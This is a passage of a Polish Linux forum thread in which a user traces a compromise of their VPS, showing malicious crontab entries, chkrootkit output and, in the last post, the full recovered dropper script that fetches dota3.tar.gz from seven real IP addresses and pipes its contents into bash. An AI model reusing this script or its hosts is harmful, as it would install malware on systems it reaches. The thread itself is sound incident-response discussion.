Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!

Ogłoszenie

Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.

#26  2020-05-03 21:28:09

  Blackhole - Użytkownik

Blackhole
Użytkownik
Skąd: G. Śląsk
Zarejestrowany: 2005-09-07
Serwis

Re: Mój VPS podobno atakuje

BiExi napisał(-a):

Blackhole napisz co Ci dodali do tego crontaba

istnieje duże prawdopodobieństwo iż ktoś robi sobie reverse shella bo któraś z usług jest na to podatna

Wpisy crontab-a zamienili mi na:

Kod:

1 1 */2 * * /home/j/.configrc/a/upd>/dev/null 2>&1
@reboot     /home/j/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0   /home/j/.configrc/b/sync>/dev/null 2>&1
@reboot     /home/j/.configrc/b/sync>/dev/null 2>&1  
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1

Ściskam prawicę, Jacek

http://doscniewoli.plPoznaj prawdę o pieniądzach
Free energy exists!

Offline

 

#27  2020-05-03 23:16:38

  Jacekalex - Podobno człowiek...;)

Jacekalex
Podobno człowiek...;)
Skąd: /dev/random
Zarejestrowany: 2008-01-07

Re: Mój VPS podobno atakuje

Musisz namierzyć parent proces dla tych wszystkich zmian, pewnie ukrywa się w kilku miejscach i pod różnymi nazwami.
Zainstaluj chkrootkit i pokaż na początek wynik z roota:

Kod:

chkrootkit -q

To jest zdecydowanie najprostsze działanie, jakie możesz zrobić.


W demokracji każdy naród ma taką władzę, na jaką zasługuje ;)
Si vis pacem  para bellum  ;)       |       Pozdrawiam :)

Offline

 

#28  2020-05-04 07:45:49

  Blackhole - Użytkownik

Blackhole
Użytkownik
Skąd: G. Śląsk
Zarejestrowany: 2005-09-07
Serwis

Re: Mój VPS podobno atakuje

Jacekalex napisał(-a):

Zainstaluj chkrootkit i pokaż na początek wynik z roota:

Kod:

chkrootkit -q

A więc tak:

Kod:

# chkrootkit -q

/usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo /usr/lib/pymodules/python2.7/.path

eth0: PACKET SNIFFER(/sbin/dhclient[595])
 The tty of the following user process(es) were not found
 in /var/run/utmp !
! RUID          PID TTY    CMD
! root          589 tty7   /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
#

Ściskam prawicę, Jacek

http://doscniewoli.plPoznaj prawdę o pieniądzach
Free energy exists!

Offline

 

#29  2020-05-04 14:14:51

  Jacekalex - Podobno człowiek...;)

Jacekalex
Podobno człowiek...;)
Skąd: /dev/random
Zarejestrowany: 2008-01-07

Re: Mój VPS podobno atakuje

Blackhole napisał(-a):

Kod:

/usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo /usr/lib/pymodules/python2.7/.path

tu namierzył na 99% twoje backdoory, systemowy instalator raczej nie używa ukrytych katalogów /usr/lib/.

Poza tym co robi Xorg na VPSie?

Ostatnio edytowany przez Jacekalex (2020-05-04 14:15:48)


W demokracji każdy naród ma taką władzę, na jaką zasługuje ;)
Si vis pacem  para bellum  ;)       |       Pozdrawiam :)

Offline

 

#30  2020-05-04 14:35:06

  Blackhole - Użytkownik

Blackhole
Użytkownik
Skąd: G. Śląsk
Zarejestrowany: 2005-09-07
Serwis

Re: Mój VPS podobno atakuje

Czyli wystarczy to usunąć i powinno być po krzyku?
Xorg jest tam, gdyż uruchamiam w środowisku graficznym platformę MT4 do Forex-u.

--- edit ---
To jednak nie ten backdoor.
Te ukryte .java* w /usr/lib/jvm to nie są katalogi, lecz pliki tekstowe (nie skrypty).
Ten trzeci plik /usr/lib/pymodules/python2.7/.path zawiera jedynie ścieżkę.

Ostatnio edytowany przez Blackhole (2020-05-04 16:16:34)


Ściskam prawicę, Jacek

http://doscniewoli.plPoznaj prawdę o pieniądzach
Free energy exists!

Offline

 

#31  2020-05-04 16:21:42

  hi - Zbanowany

hi
Zbanowany
Zarejestrowany: 2016-03-24

Re: Mój VPS podobno atakuje

Jacekalex napisał(-a):

systemowy instalator raczej nie używa ukrytych katalogów /usr/lib/

java używa, w sumie można rzec, że sama w sobie jest 'legalnym backdoorem' :)

Ostatnio edytowany przez hi (2020-05-04 16:22:57)


"Są drogi, którymi nie należy podążać, armie, których nie należy atakować, fortece, których nie należy oblegać, terytoria, o które nie należy walczyć, zarządzenia, których nie należy wykonywać" Sun Tzu

Offline

 

#32  2020-05-04 18:40:41

  morfik - Cenzor wirtualnego świata

morfik
Cenzor wirtualnego świata
Skąd: ze WSI
Zarejestrowany: 2011-09-15
Serwis

Re: Mój VPS podobno atakuje

Jacekalex napisał(-a):

Blackhole napisał(-a):

Kod:

/usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo /usr/lib/pymodules/python2.7/.path

tu namierzył na 99% twoje backdoory, systemowy instalator raczej nie używa ukrytych katalogów /usr/lib/.

Poza tym co robi Xorg na VPSie?

No ale przecie:

Kod:

# apt-file search /usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo
openjdk-8-jre-headless: /usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo

#  apt-file search /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo                                       
openjdk-11-jre-headless: /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo

#  apt-cache policy openjdk-8-jre-headless
openjdk-8-jre-headless:
  Installed: 8u252-b09-1
  Candidate: 8u252-b09-1
  Version table:
 *** 8u252-b09-1 990
        990 https://deb.debian.org/debian sid/main amd64 Packages
        100 /var/lib/dpkg/status

#  apt-cache policy openjdk-11-jre-headless
openjdk-11-jre-headless:
  Installed: (none)
  Candidate: 11.0.7+10-3
  Version table:
     11.0.7+10-3 990
        990 https://deb.debian.org/debian sid/main amd64 Packages
     11.0.7+9-1 500
        500 https://deb.debian.org/debian testing/main amd64 Packages

Ten  ostatni z python2 pewnie już wyleciał z debiana z powodu usuwania python2.

Ostatnio edytowany przez morfik (2020-05-04 18:41:26)

Offline

 

#33  2020-05-10 14:15:54

  Blackhole - Użytkownik

Blackhole
Użytkownik
Skąd: G. Śląsk
Zarejestrowany: 2005-09-07
Serwis

Re: Mój VPS podobno atakuje

Dziś mój automatyczny security-check znalazł takie coś:

Kod:

2020-05-10/nie 14:09| ALERT! /proc/*/exe deleted:
    lrwxrwxrwx 1 lightdm          lightdm          0 kwi 23 07:39 /proc/1261/exe -> /lib/systemd/systemd (deleted)
    lrwxrwxrwx 1 root             root             0 kwi 23 07:39 /proc/1262/exe -> /lib/systemd/systemd (deleted)
    lrwxrwxrwx 1 fx               fx               0 kwi 28 01:39 /proc/25733/exe -> /lib/systemd/systemd (deleted)
    lrwxrwxrwx 1 root             root             0 kwi 27 17:39 /proc/25734/exe -> /lib/systemd/systemd (deleted)
    lrwxrwxrwx 1 j                j                0 maj 10 11:57 /proc/5778/exe -> /lib/systemd/systemd (deleted)
    lrwxrwxrwx 1 root             root             0 maj 10 11:57 /proc/5779/exe -> /lib/systemd/systemd (deleted)
    lrwxrwxrwx 1 root             root             0 maj  3 17:10 /proc/6587/exe -> /lib/systemd/systemd-logind (deleted)
2020-05-10/nie 14:09| Szczegóły:
    [1261]
      comm:     systemd
      cmdline:  /lib/systemd/systemd--user
      loginuid: 117
    [1262]
      comm:     (sd-pam)
      cmdline:  (sd-pam)
      loginuid: 117
    [25733]
      comm:     systemd
      cmdline:  /lib/systemd/systemd--user
      loginuid: 1000
    [25734]
      comm:     (sd-pam)
      cmdline:  (sd-pam)
      loginuid: 1000
    [5778]
      comm:     systemd
      cmdline:  /lib/systemd/systemd--user
      loginuid: 1004
    [5779]
      comm:     (sd-pam)
      cmdline:  (sd-pam)
      loginuid: 1004
    [6587]
      comm:     systemd-logind
      cmdline:  /lib/systemd/systemd-logind
      loginuid: 4294967295

Nie istnieje plik /lib/systemd/systemd--user.
Czy to jest Waszym zdaniem podejrzane? Jak to bardziej szczegółowo zbadać?


Ściskam prawicę, Jacek

http://doscniewoli.plPoznaj prawdę o pieniądzach
Free energy exists!

Offline

 

#34  2020-05-10 22:13:30

  Jacekalex - Podobno człowiek...;)

Jacekalex
Podobno człowiek...;)
Skąd: /dev/random
Zarejestrowany: 2008-01-07

Re: Mój VPS podobno atakuje

Jeżeli jakieś backdoory włazły do serwera, to najlepiej go zaorać i postawić od nowa, a ważne rzeczy z backupu przywrócić.

Szukanie backdoora w systemie, kiedy się podszywa pod różne aplikacje, to zabawa w kotka i myszkę, albo szukanie igły w stogu siana.
Żeby sobie z tym poradzić trzeba sporo doświadczenia praktycznego.

Pozdro


W demokracji każdy naród ma taką władzę, na jaką zasługuje ;)
Si vis pacem  para bellum  ;)       |       Pozdrawiam :)

Offline

 

#35  2020-05-11 14:14:06

  Blackhole - Użytkownik

Blackhole
Użytkownik
Skąd: G. Śląsk
Zarejestrowany: 2005-09-07
Serwis

Re: Mój VPS podobno atakuje

Udało mi się znaleźć skrypt, który zaciągał kod z innych serwerów i instalował na moim VPS. Skrypt był wywoływany tak:

Kod:

/bin/bash./tddwrt7s.sh http://149.202.162.73/dota3.tar.gz http://137.74.80.36/dota3.tar.gz http://167.114.36.165/dota3.tar.gz http://159.203.69.48/dota3.tar.gz http://37.139.0.226/dota3.tar.gz http://45.55.210.248/dota3.tar.gz http://192.241.211.94/dota3.tar.gz

a jego kod jest taki:

Kod:

# cat tddwrt7s.sh
#!/bin/bash

if [[ "$ARCH" =~ ^arm ]]; then
    echo "Arm detected. Exiting"    
    pkill -9 rsync
    kill -9 `ps x|grep rsync|grep -v grep|awk '{print $1}'`> .out
    for pid in $(ps -ef | grep "rsync" | awk '{print $2}'); do kill -9 $pid; done> .out
    exit 0
fi

rm -rf /tmp/.X2*

if [ -d "/tmp/.X25-unix/.rsync/c" ]; then
        exit 0
else
        cd /tmp
        rm -rf .ssh
        rm -rf .mountfs
        rm -rf .X2*
        rm -rf .X3*
    rm -rf .X19-unix*
        rm -rf .X21-unix*
        rm -rf .X22-unix*
        rm -rf .X23-unix
        rm -rf .X25-unix
        mkdir .X25-unix
        cd .X25-unix
        RANGE=6
        s=$RANDOM
        let "s %= $RANGE"

    if [ $s == 0 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 15 ]s
                        curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1
                fi
    if [ $s == 1 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 5 ]s
                        curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2
                fi
    if [ $s == 2 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 25 ]s
                        curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $3
                fi
    if [ $s == 3 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 10 ]s
                        curl -O -f $4 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $4
                fi
    if [ $s == 4 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 30 ]s
                        curl -O -f $5 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $5
                fi
    if [ $s == 5 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 15 ]s
                        curl -O -f $6 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $6
                fi
    if [ $s == 6 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 55 ]s
                        curl -O -f $7 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $7
                fi
        sleep 60s
        tar xvf dota3.tar.gz
        sleep 10s
#       rm -rf dota3.tar.gz
        cd .rsync
        cat /tmp/.X25-unix/.rsync/initall | bash 2>1&
fi

exit 0

Skrypt z 1 z 7 lokalizacji pobiera plik dota3.tar.gz, rozpakowuje go i wywołuje z niego skrypt initall.

Ostatnio edytowany przez Blackhole (2020-05-11 14:17:01)


Ściskam prawicę, Jacek

http://doscniewoli.plPoznaj prawdę o pieniądzach
Free energy exists!

Offline

 

Stopka forum

Powered by PunBB
© Copyright 2002–2005 Rickard Andersson
To nie jest tylko forum, to nasza mała ojczyzna ;-)